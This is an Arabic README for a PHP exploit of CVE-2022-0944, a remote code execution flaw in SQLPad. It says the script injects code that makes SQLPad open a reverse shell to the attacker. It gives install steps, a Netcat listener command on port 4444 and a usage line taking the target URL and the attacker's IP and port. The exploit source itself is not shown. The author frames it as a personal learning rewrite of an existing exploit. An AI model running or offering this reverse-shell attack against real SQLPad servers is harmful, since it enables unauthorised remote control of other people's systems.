
CVE-2022-0944 استغلال تنفيذ التعليمات البرمجية عن بُعد
يُصمَّم هذا الكود البرمجي بلغة PHP لاستغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في SQLPad، المرتبطة بـ CVE-2022-0944.
يعمل الكود عن طريق حقن تعليمات برمجية خبيثة في تطبيق SQLPad، مما يُجبِره على تنفيذ أمر نظام يفتح قشرة عكسية (reverse shell) – اتصالاً يمنح المهاجم تحكماً عن بُعد في النظام المُعرَّض للثغرة.
sudo apt-get install php-clisudo apt-get install php-curlلالتقاط اتصال القشرة العكسية، شغّل Netcat على جهاز المهاجم:
nc -lvnp 4444
php exploit.php <root_url> <attacker_ip> <attacker_port>
<root_url>: عنوان URL الجذر لـ SQLPad المُعرَّض للثغرة (مثال: http://target.com:3000)
<attacker_ip>: عنوان IP الخاص بالمهاجم الذي يستمع لاتصال القشرة العكسية (نفس عنوان IP الخاص بـ Netcat)
<attacker_port>: المنفذ الذي يستمع عليه المهاجم (نفس منفذ Netcat)
اعتمد منطق الاستغلال الأصلي على هذا المستودع:
كان هدفي هنا فهم منطق الاستغلال وإعادة كتابته بلغة برمجة أخرى كتحدٍّ شخصي.
مرجع إضافي: 🔗 CVE-2022-0944 – NVD